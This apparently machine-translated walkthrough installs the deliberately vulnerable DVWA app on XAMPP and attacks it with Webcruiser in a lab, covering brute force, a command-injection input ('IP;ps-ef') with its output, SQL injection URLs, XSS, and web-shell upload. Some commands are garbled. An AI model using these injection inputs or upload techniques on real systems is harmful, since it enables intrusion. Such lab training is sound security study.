"Network security" DVWA and Webcruiser attack Walkthrough process detailed

1. Download Dvwa and XAMPP Linux versions
http://www.dvwa.co.uk/
Https://www.apachefriends.org/zh_cn/index.html
2, Installation Xampp
./xampp.run follow the prompts to install, after the installation directory is/OPT/LAMPP
./xampp Start
./sampp Stop
After starting the client machine remote use IP address cannot access the XAMPP server (HTTP://192.168.102.4/XAMPP), vi/etc/extra/httpd-xampp.conf, comment out the following code restart XAMPP can
#<locationmatch "^/(? I: (?: xampp|security|licenses|phpmyadmin|webalizer|server-status|server-info))" >
# Require Local
# ErrorDocument 403/error/xampp_forbidden.html.var
#</locationmatch>
See the main interface to indicate that the installation was successful.
Test database connection: Connect the database with MySQL in the./bin directory
Mysql-h Localhost-u Root
Direct access: Execute the following statement successfully can see the database information, indicating XAMPP installation success
Show database ();
3, installation Dvwa directly extracted to the./htdocs directory, and then use the IP/DVWA directory access, you are prompted to connect the database, as modified as follows
VI htdocs/dvwa/config/config.inc.php The following password information is removed to a blank password can be

$_DVWA = Array ();
$_dvwa[' db_server '] = ' localhost ';
$_dvwa[' db_database '] = ' DVWA ';
$_dvwa[' db_user '] = ' root ';
$_dvwa[' db_password '] = ';

4, enter the login interface Http://192.168.102.4/dvwa, you need to enter the user name and password Admin/password, set DVWA security to Low
5. Use Webcruiser for primary attack verification under Windows
Webcruiser:http://www.moonsec.com/content/uploadfile/201410/92a41413629442.zip
A, brute force
Brute force user name password is Admin/password, mainly using Post/get to submit username and password data for brute force cracking.
B. Command Execute
You can execute multiple commands without judging the command
Input: 192.168.102.4;ps-ef

PING 192.168.102.4 (192.168.102.4) bytes of data.
Bytes from 192.168.102.4:icmp_seq=1 ttl=64 time=0.019 ms
Bytes from 192.168.102.4:icmp_seq=2 ttl=64 time=0.024 ms
Bytes from 192.168.102.4:icmp_seq=3 ttl=64 time=0.036 ms

---192.168.102.4 ping statistics---
3 Packets transmitted, 3 received, 0% packet loss, time 2000ms
RTT Min/avg/max/mdev = 0.019/0.026/0.036/0.008 ms
UID PID PPID C stime TTY time CMD
Root 1 0 0 January 07? 00:00:36/usr/lib/systemd/systemd--switched-root--system--deserialize 19
Root 2 0 0 January 07? 00:00:00 [Kthreadd]
Root 3 2 0 January 07? 00:00:08 [ksoftirqd/0]
Root 5 2 0 January 07? 00:00:00 [kworker/0:0h]
Root 7 2 0 January 07? 00:00:08 [migration/0]
Root 8 2 0 January 07? 00:00:00 [RCU_BH]
Root 9 2 0 January 07? 00:11:38 [rcu_sched]
Root 10 2 0 January 07? 00:00:44 [watchdog/0]
Root 11 2 0 January 07? 00:00:28 [WATCHDOG/1]
Root 12 2 0 January 07? 00:00:06 [MIGRATION/1]
Root 13 2 0 January 07? 00:00:08 [KSOFTIRQD/1]
Root 15 2 0 January 07? 00:00:00 [kworker/1:0h]
Root 16 2 0 January 07? 00:00:28 [WATCHDOG/2]
Root 17 2 0 January 07? 00:00:06 [MIGRATION/2]
Root 18 2 0 January 07? 00:00:07 [KSOFTIRQD/2]
Root 20 2 0 January 07? 00:00:00 [kworker/2:0h]
Root 21 2 0 January 07? 00:00:27 [WATCHDOG/3]
Root 22 2 0 January 07? 00:00:06 [MIGRATION/3]
Root 23 2 0 January 07? 00:00:13 [KSOFTIRQD/3]
Root 25 2 0 January 07? 00:00:00 [kworker/3:0h]
Root 26 2 0 January 07? 00:00:59 [WATCHDOG/4]
Root 27 2 0 January 07? 00:00:07 [MIGRATION/4]
Root 28 2 0 January 07? 00:00:02 [KSOFTIRQD/4]
Root 30 2 0 January 07? 00:00:00 [kworker/4:0h]
Root 31 2 0 January 07? 00:02:46 [WATCHDOG/5]
Root 32 2 0 January 07? 00:00:08 [MIGRATION/5]
Root 33 2 0 January 07? 00:00:02 [KSOFTIRQD/5]
Root 35 2 0 January 07? 00:00:00 [kworker/5:0h]
C, Cross Site Request forgery (CSRF)
Do not directly determine if the original password verification two password is equal after the direct modification of the password
D, File Inclusion
You can view the relevant file information by modifying the Include file
http://192.168.102.4/dvwa/vulnerabilities/fi/?page=include.php
E, SQL injection
http://192.168.102.4/dvwa/vulnerabilities/sqli/
http://192.168.102.4/dvwa/vulnerabilities/sqli/?Submit=Submit&id=99999999
http://192.168.102.4/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1588033
http://192.168.102.4/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1588033

By right-clicking on the SQL injection POC entry, you can view the database and table and data information as shown in 1 and 2

F, Blinds
With the above SQL injection, SQL Blind is a new technology used by attackers that, when the error message is masked, allows the attacker to still get the information they need and takes a long time.
G, cross-site
One is to reflect the cross-site, one is to store the cross-site
Reflection: The XSS code appears in the URL, submits to the server as input, the server-side resolves the response, and the XSS code is passed back to the browser with the response content, and finally the browser resolves to execute the XSS code. This process is like a reflection, so it's called reflective XSS.
Storage: The difference between a stored XSS and a reflective XSS is that the submitted code is stored on the server side (database, memory, file system, etc.) and no more XSS code is submitted the next time the target page is requested

References are links to addresses from other websites or servers
Http://192.168.102.4/dvwa/vulnerabilities/xss_s/^btnsign=sign guestbook&mtxmessage= Wcrtextareatestinput9749323&txtname=3075018
Input Store to Server
There is also a Dom xss:dom XSS and reflection type XSS, storage-type XSS is the difference between the DOM XSS code does not require server participation, triggering XSS by the browser-side DOM parsing, is entirely the client thing

H, File upload
By uploading the error message can see the file upload directory, if the upload is successful can upload ponies and horses to capture the entire machine
Warning:move_uploaded_file (.. /.. /HACKABLE/UPLOADS/WENJIN_CRACK.PCAP): Failed to open stream:permission denied in/opt/lampp/htdocs/dvwa/ Vulnerabilities/upload/source/low.php on line 7
Warning:move_uploaded_file (): Unable to move '/opt/lampp/temp/php1fmfhk ' to '. /.. /hackable/uploads/wenjin_crack.pcap ' in/opt/lampp/htdocs/dvwa/vulnerabilities/upload/source/low.php on line 7

"Network security" DVWA and Webcruiser attack Walkthrough process detailed